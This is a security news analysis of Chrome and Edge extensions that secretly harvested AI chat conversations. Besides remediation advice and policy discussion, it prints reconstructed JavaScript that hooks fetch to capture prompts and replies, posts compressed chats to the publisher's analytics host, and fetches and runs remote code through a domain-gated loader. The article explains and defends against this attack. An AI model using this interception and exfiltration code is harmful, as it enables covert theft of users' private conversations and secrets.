Security researchers have exposed a family of seemingly benign Chrome and Edge extensions that quietly intercepted entire conversations with major AI chat services and forwarded those chats to remote analytics servers—an exposure that affects millions of users and raises urgent questions about marketplace review, extension permissions, and enterprise risk management.
Background
Security firm Koi identified a set of extensions published by the same developer that—following an automatic update—began injecting platform-specific scripts into AI chat web pages to capture prompts, responses, timestamps and session metadata before forwarding that data to analytics endpoints. The behavior reportedly became active with a July 2025 update and was enabled by default, meaning most installed copies started harvesting data without a fresh, contextual consent prompt.

The most prominent names flagged in the analysis are Urban VPN Proxy, 1ClickVPN Proxy, Urban Browser Guard and Urban Ad Blocker across both the Chrome Web Store and Microsoft Edge Add-ons catalogues. Researchers and aggregated reporting place the combined install base in the multi‑million range—Urban VPN Proxy alone accounts for the lion’s share—producing a potential blast radius that is operationally significant for both consumers and organizations.
How the interception worked: a technical breakdown
Executor scripts and page-level injection
Rather than relying on ordinary network instrumentation, the flagged extensions deployed per‑platform executor scripts—small, targeted JavaScript modules that run only when a user opens a supported AI chat page. Those executors are delivered by content scripts into the page's own JavaScript context, where they can hook page internals. This allows them to observe and capture messages before they are encrypted for transport or after they are rendered, effectively bypassing the protections that server-side controls provide.
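To make the mechanism concrete, here is a minimal sketch, assuming a standard Manifest V3 content script, of how an extension can push an executor into the page's main world. This is a reconstruction of the reported pattern, not the recovered code; the file path is hypothetical, and the file would need to be listed under web_accessible_resources in the manifest.

```js
// content-script.js: runs in the extension's isolated world.
// It cannot see page variables directly, so it drops a <script> tag that
// loads an "executor" into the page's own context, where page internals
// (fetch, XHR, app state) are reachable.
const executor = document.createElement("script");
executor.src = chrome.runtime.getURL("executors/chat-platform.js"); // hypothetical path
executor.onload = () => executor.remove(); // tidy up so nothing lingers in the DOM
(document.head || document.documentElement).appendChild(executor);
```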
API overriding and data capture
The injected scripts overrode core browser APIs such as fetch and XMLHttpRequest, intercepting outgoing prompts and incoming model outputs; a minimal sketch of this hooking pattern appears after the list below. The collected package reportedly included:
- Every user prompt in plain text
- The full assistant response (model output)
- Conversation identifiers, timestamps and session metadata
- Page-specific model/platform identifiers and, in some cases, contextual cookies/localStorage state
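The following sketch reconstructs the fetch override described above from the public write-ups; recordConversation and the captured field names are illustrative assumptions, not recovered code.

```js
// Page-context interception: wrap window.fetch so the prompt (request body)
// and the model reply (response body) can be copied before or after the page
// handles them. XMLHttpRequest can be wrapped the same way.
const realFetch = window.fetch;
window.fetch = async function (...args) {
  const response = await realFetch.apply(this, args);
  try {
    const url = args[0] && args[0].url ? args[0].url : String(args[0]);
    const prompt = args[1] && args[1].body;        // outgoing user prompt (simplified)
    const reply = await response.clone().text();   // incoming model output
    recordConversation({ url, prompt, reply, ts: Date.now() }); // hypothetical collector
  } catch (_) { /* swallow errors so the page keeps working normally */ }
  return response;
};
```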
Exfiltration and analytics endpoints
Captured data was compressed and transmitted to endpoints under the publisher’s control—named in reporting as analytics.urban-vpn.com and stats.urban-vpn.com—before any downstream handling. Telemetry published by Koi and others shows these were active collection endpoints receiving harvested conversation packages.
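A sketch of the exfiltration step under the same assumptions; the endpoint hostname comes from the reporting, while the path, field names and choice of gzip compression are illustrative.

```js
// Compress the captured record with the browser's built-in CompressionStream
// and POST it to the publisher-controlled endpoint named in the reporting.
async function exfiltrate(record) {
  const payload = new Blob([JSON.stringify(record)]);
  const gzipped = await new Response(
    payload.stream().pipeThrough(new CompressionStream("gzip"))
  ).blob();
  await fetch("https://analytics.urban-vpn.com/collect", { // path "/collect" is assumed
    method: "POST",
    headers: { "Content-Type": "application/json", "Content-Encoding": "gzip" },
    body: gzipped,
  });
}
```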
Scope and scale: why this matters
The combined install count for the flagged family runs to several million across Chrome and Edge, with individual store listings showing hundreds of thousands to millions of users. Because the collection targeted multiple AI platforms—ChatGPT, Google Gemini, Anthropic Claude, Microsoft Copilot, Perplexity and others—a single infected profile could leak sensitive interactions across many services.

Two amplification factors make this especially dangerous:
- Auto‑update propagation: Extensions update automatically by default. A runtime behavior change pushed by a developer can be delivered en masse without forced re‑consent, converting trust built over time into a surveillance conduit overnight.
- Client‑side access: AI assistants are often used for drafting, debugging, troubleshooting, or sharing credentials and API keys. Anything pasted into a conversation may have been captured verbatim. That materially increases the downstream risk of account takeover, corporate data leakage, or regulatory exposure.
What was collected — and the privacy stakes
The dataset described in the technical analysis is broad and sensitive:
- Plain text prompts (user inputs)
- Model replies (assistant outputs)
- Session metadata (timestamps, conversation IDs)
- Model identifiers (which AI model was used)
- Potentially contextual site state (cookies, localStorage entries) depending on granted permissions
Marketplace failure: how did these extensions get Featured badges?
A deeply unsettling detail is that several of these extensions carried “Featured” badges in the official stores—signals users rely on as implicit trust marks. The presence of runtime-exfiltration logic undercuts the reliability of a static listing review process that checks manifests, UI assets and privacy policies without exercising extensions dynamically against popular web apps.

Key causes of the review gap:
- Static review cannot easily detect code that executes only on specific domains (for example, ai.example.com) or minified/obfuscated payloads whose behavior is revealed only at runtime; the sketch after this list illustrates the pattern.
- Auto‑update channels allow dramatic behavioral changes to be pushed after initial review without a store‑level forced re‑consent flow.
- Buried privacy‑policy language—while technically disclosure—fails to provide contextual, understandable consent at the time the behavior affects users.
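As an illustration of the first gap, consider a hypothetical domain-gated loader. Nothing here is the actual extension code, but it shows why a static scan of the shipped package reveals little: the targets are hashed and the payload arrives only at runtime.

```js
// No AI-platform domain appears as a plain string anywhere in the reviewable
// package; hostnames are matched by hash prefix, and the real payload is
// fetched and executed only on a matching host.
const TARGET_HASH_PREFIXES = ["9f2b"]; // illustrative SHA-256 prefixes
async function maybeActivate() {
  const bytes = new TextEncoder().encode(location.hostname);
  const digest = await crypto.subtle.digest("SHA-256", bytes);
  const hex = [...new Uint8Array(digest)]
    .map((b) => b.toString(16).padStart(2, "0"))
    .join("");
  if (TARGET_HASH_PREFIXES.some((p) => hex.startsWith(p))) {
    const res = await fetch("https://cdn.example-analytics.net/executor.js"); // hypothetical
    new Function(await res.text())(); // behavior materializes only at runtime
  }
}
maybeActivate();
```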
What we can and cannot verify
The technical evidence that content was captured and exfiltrated to analytics endpoints is reproducible in multiple independent write‑ups and store‑artifact traces. The timeline—behavior introduced in a July 2025 update and enabled by default—is consistent across sources. Those core technical claims are strongly supported.

What remains less exhaustively documented in public reporting is the precise downstream commercialization chain: which named third parties (if any) purchased raw conversation logs, or the specific contracts that moved data from the analytics endpoint into buyer hands. The publisher’s privacy policy references sharing with an affiliated analytics firm (reported as BiScience in some materials), which supports plausible monetization hypotheses, but direct buyer receipts or purchase records were not published at the time of the reporting. Treat buyer claims as probable but requiring forensic confirmation.
Immediate actions for users (prioritized)
If any of the named extensions are installed, take these steps now:
- Uninstall the implicated extension(s) from every browser and profile on every device. Manual removal is the only sure way to stop the runtime behavior.
- Clear browser cookies, site data and localStorage for AI service domains you used while the extension was installed; sign out of the services and force session invalidation.
- Revoke and rotate any credentials, API keys or tokens you pasted into AI chats. Assume pasted secrets are compromised and issue replacements.
- Change passwords for accounts referenced in sensitive chats and enable multi‑factor authentication (MFA) everywhere possible.
- For consumer AI services, use the vendor’s data controls: delete chat history where available and disable any “Improve the model” or similar toggles.
Immediate actions for IT and security teams (enterprise checklist)
Enterprises should assume compromise for any employee who used AI chat tools while these extensions were installed and respond as follows:
- Use enterprise browser controls to enforce a default‑deny extension posture (allowlist only vetted extensions). Chrome Enterprise and Microsoft Intune/GPO provide ExtensionInstallAllowlist and ExtensionInstallBlocklist policies; a sample policy sketch follows this checklist.
- Audit endpoints for the identified extension IDs; remove occurrences and force remediation at scale. Koi published extension IDs and indicators useful for scanning.
- Hunt for outbound connections to the reported analytics endpoints (for example analytics.urban-vpn.com / stats.urban-vpn.com) using EDR, proxy logs and network telemetry.
- Rotate and revoke enterprise secrets that may have been disclosed in AI chats; treat exposed keys as compromised and reissue them.
- Issue immediate guidance to staff: prohibit pasting production credentials into consumer AI assistants and restrict unmanaged extensions on profiles used for sensitive work.
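For reference, a minimal sketch of a default-deny Chrome policy file (for example, a JSON file dropped under /etc/opt/chrome/policies/managed/ on Linux, or the equivalent registry/Intune settings on Windows). The allowlisted ID is a placeholder for a vetted extension, not a recommendation.

```json
{
  "ExtensionInstallBlocklist": ["*"],
  "ExtensionInstallAllowlist": ["<32-character-id-of-a-vetted-extension>"]
}
```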
Regulatory and policy implications
If the exfiltration pipeline transferred raw conversational content to an external data broker for marketing analytics, that behavior would appear inconsistent with major store policies (for example Chrome’s Limited Use rules), which restrict transfers of user data to advertising platforms and data brokers without transparent constraints. Platform enforcement could include delisting, developer account suspension, audits or other penalties—but takedowns alone do not remediate already‑infected browsers.

Regulators may view undisclosed mass harvesting of conversational content as an unfair or deceptive practice, especially when the data contains health, financial or identifying information. The combination of deceptive marketing (privacy branding) and buried legal disclosures heightens the consumer‑protection risk. Enterprises may have contractual and compliance obligations if employee data was exposed.
Marketplace and platform responsibilities: fixes that should be implemented
A set of practical platform reforms would materially reduce the likelihood of similar incidents:
- Mandate runtime behavioral testing for high‑privilege extensions. Automated sandboxed simulations should exercise extensions against widely used web apps—including AI assistants—to detect page‑triggered injection and exfiltration; a sketch of such a check follows this list.
- Require forced re‑consent flows at the store level whenever an extension pushes updates that materially change data‑collection behavior. Auto‑updates should not be a covert pathway for new surveillance features.
- Add transparency requirements for trust signals: disclose the rationale and last runtime re‑validation date for Featured/Trusted badges so users can evaluate the meaning of marketplace endorsements.
- Enforce stronger penalties and mandatory audits when large datasets of sensitive content are implicated, including independent verification of data deletion where appropriate.
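To show what a first-pass runtime check could look like, here is a hedged sketch using Puppeteer: load the candidate extension into a throwaway browser, open a stand-in chat page, and test whether core APIs were replaced. The URL and extension path are placeholders, and a real store pipeline would need far deeper instrumentation than this.

```js
const puppeteer = require("puppeteer");

(async () => {
  const ext = "/path/to/unpacked-extension"; // placeholder
  const browser = await puppeteer.launch({
    headless: false, // loading extensions requires a full Chromium instance
    args: [`--disable-extensions-except=${ext}`, `--load-extension=${ext}`],
  });
  const page = await browser.newPage();
  await page.goto("https://chat.example.com"); // stand-in for a real AI chat page
  // Native implementations stringify to "[native code]"; a page-injected
  // override will not, which is a cheap first-pass tamper signal.
  const tampered = await page.evaluate(
    () =>
      !window.fetch.toString().includes("[native code]") ||
      !XMLHttpRequest.prototype.open.toString().includes("[native code]")
  );
  console.log(tampered ? "fetch/XHR overridden at runtime" : "core APIs look native");
  await browser.close();
})();
```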
Risk analysis: strengths of the evidence and open questions
What is strongly supported:
- The presence of per‑platform executor scripts that hook into AI chat pages and override fetch/XHR appears in multiple independent technical write‑ups and store artifacts.
- The behavioral change tied to a July 2025 update and the broad install base of the implicated extensions are consistent across reporting.
What remains open:
- Precise evidence of named downstream buyers for harvested conversations—purchase receipts, contracts or buyer acknowledgements—has not been exhaustively documented publicly. The publisher’s privacy policy and affiliate links support plausible monetization, but forensic confirmation of buyers remains an investigatory gap. Treat claims of sales as probable but not fully proven until transactional artifacts are produced.

Overall, this is a high‑severity event for consumers and enterprises because the captured asset is conversation content—the very thing users assume is private. The combination of client‑side access, auto‑update distribution, and multi‑service targeting makes the exposure durable and wide.
Practical recommendations for long‑term defense
- Treat browser extension governance as a first‑class security control. For organizations, that means default‑deny, allowlist only, and centralized management of extension inventories.
- Prefer open‑source or enterprise‑vetted extensions where possible; inspect code and maintain a small, curated extension catalog for employees who need specialized tools.
- Avoid pasting secrets into consumer AI assistants. Where AI is used for business purposes, adopt managed enterprise LLM services with contractual data protections and auditability.
- Advocate for platform changes: insist that marketplaces implement runtime testing, force re‑consent on behavior changes, and increase transparency for trust badges.
Conclusion
The discovery that widely distributed Chrome and Edge extensions—marketed as privacy and VPN tools—were harvesting full AI conversations exposes a new and immediate privacy frontier: client‑side code that is trusted by users but capable of siphoning the very content people share with AI assistants. The core technical findings are robust: per‑platform executor scripts captured prompts and replies and exfiltrated them to analytics endpoints after a default‑on update. The regulatory and remediation implications are severe and demand both immediate action from users and sustained reforms from browser marketplaces.

Short term: uninstall the implicated extensions, rotate credentials and audit accounts. Medium term: enterprises must lock down extension policies and vendors must adopt runtime verification and stronger consent requirements. Without those changes, trust signals like “Featured” will continue to mislead, and the next mass‑harvest campaign will find the same holes to exploit.
Source: digit.in These Chrome and Edge browser extensions steal your AI chats, delete them now